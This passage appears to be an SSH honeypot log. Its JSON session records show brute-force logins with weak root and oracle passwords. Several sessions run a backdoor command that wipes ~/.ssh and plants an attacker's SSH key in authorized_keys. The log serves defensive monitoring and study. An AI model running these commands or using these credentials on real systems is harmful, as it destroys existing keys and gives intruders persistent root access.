"score": 0,
"tags": []
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "6720a7c1b5ed",
"src_ip": "46.147.113.91",
"start_time": "2026-06-30T16:29:43.045033Z",
"end_time": "2026-06-30T16:29:44.512271Z",
"duration": "1.5",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "e6836f2957c9",
"src_ip": "46.147.113.91",
"start_time": "2026-06-30T16:29:40.475415Z",
"end_time": "2026-06-30T16:29:42.808187Z",
"duration": "2.3",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 222000
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "4f91ee020e43",
"src_ip": "46.147.113.91",
"start_time": "2026-06-30T16:29:37.751243Z",
"end_time": "2026-06-30T16:29:44.508331Z",
"duration": "6.8",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "222000"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "19c471d51742",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:29:12.525036Z",
"end_time": "2026-06-30T16:29:13.397777Z",
"duration": "0.9",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "fedb6ebae629",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:29:10.469442Z",
"end_time": "2026-06-30T16:29:12.399581Z",
"duration": "1.9",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / admin_2024
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "0d2551b6b6b0",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:29:08.063721Z",
"end_time": "2026-06-30T16:29:13.401571Z",
"duration": "5.3",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "admin_2024"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "4e552ba91836",
"src_ip": "189.113.47.155",
"start_time": "2026-06-30T16:28:44.829168Z",
"end_time": "2026-06-30T16:28:45.900615Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "0b83907856ef",
"src_ip": "189.113.47.155",
"start_time": "2026-06-30T16:28:42.580213Z",
"end_time": "2026-06-30T16:28:44.660167Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 123456789!
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "e1de4c990b7b",
"src_ip": "189.113.47.155",
"start_time": "2026-06-30T16:28:40.253490Z",
"end_time": "2026-06-30T16:28:45.897643Z",
"duration": "5.6",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "123456789!"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: Administrator
{
"id": "69e7297b750b",
"src_ip": "46.147.113.91",
"start_time": "2026-06-30T16:27:47.274796Z",
"end_time": "2026-06-30T16:27:49.497161Z",
"duration": "2.2",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "Administrator",
"pass": "Administrator"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: oracle / 3245gs5662d34
{
"id": "d718e3a1affb",
"src_ip": "189.113.47.155",
"start_time": "2026-06-30T16:26:46.423453Z",
"end_time": "2026-06-30T16:26:47.494342Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "oracle",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "ade13fb36c31",
"src_ip": "189.113.47.155",
"start_time": "2026-06-30T16:26:44.182819Z",
"end_time": "2026-06-30T16:26:46.254509Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: oracle / Oracle123
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "5969ef617e6b",
"src_ip": "189.113.47.155",
"start_time": "2026-06-30T16:26:41.963035Z",
"end_time": "2026-06-30T16:26:47.491430Z",
"duration": "5.5",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "oracle",
"pass": "Oracle123"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: oracle / 3245gs5662d34
{
"id": "e4b7e2239453",
"src_ip": "83.235.16.111",
"start_time": "2026-06-30T16:26:33.067036Z",
"end_time": "2026-06-30T16:26:34.241223Z",
"duration": "1.2",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "oracle",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "10fb497fec5a",
"src_ip": "83.235.16.111",
"start_time": "2026-06-30T16:26:30.734556Z",
"end_time": "2026-06-30T16:26:32.875236Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: oracle / Oracle123
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "11b7a895fa73",
"src_ip": "83.235.16.111",
"start_time": "2026-06-30T16:26:28.358815Z",
"end_time": "2026-06-30T16:26:34.236644Z",
"duration": "5.9",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "oracle",
"pass": "Oracle123"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "bffc19a683dc",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:26:22.464895Z",
"end_time": "2026-06-30T16:26:23.406043Z",
"duration": "0.9",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "af1c03cd217b",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:26:20.266111Z",
"end_time": "2026-06-30T16:26:22.336388Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / odoo123
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "9e90c9c3ab83",
"src_ip": "124.45.35.17",
"start_time": "2026-06-30T16:26:18.356767Z",
"end_time": "2026-06-30T16:26:23.402359Z",
"duration": "5.0",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "odoo123"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "802bd9817a76",
"src_ip": "46.147.113.91",
"start_time": "2026-06-30T16:26:02.138733Z",
"end_time": "2026-06-30T16:26:03.386528Z",
"duration": "1.2",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "f1bdf694ce46",
"src_ip": "46.147.113.91",
"start_time": "2026-06-30T16:25:59.626350Z",
"end_time": "2026-06-30T16:26:01.942039Z",
"duration": "2.3",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / P@ssw0rd!234
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "4d2dd59f9352",
"src_ip": "46.147.113.91",
"start_time": "2026-06-30T16:25:56.946923Z",
"end_time": "2026-06-30T16:26:03.389465Z",
"duration": "6.4",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "P@ssw0rd!234"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}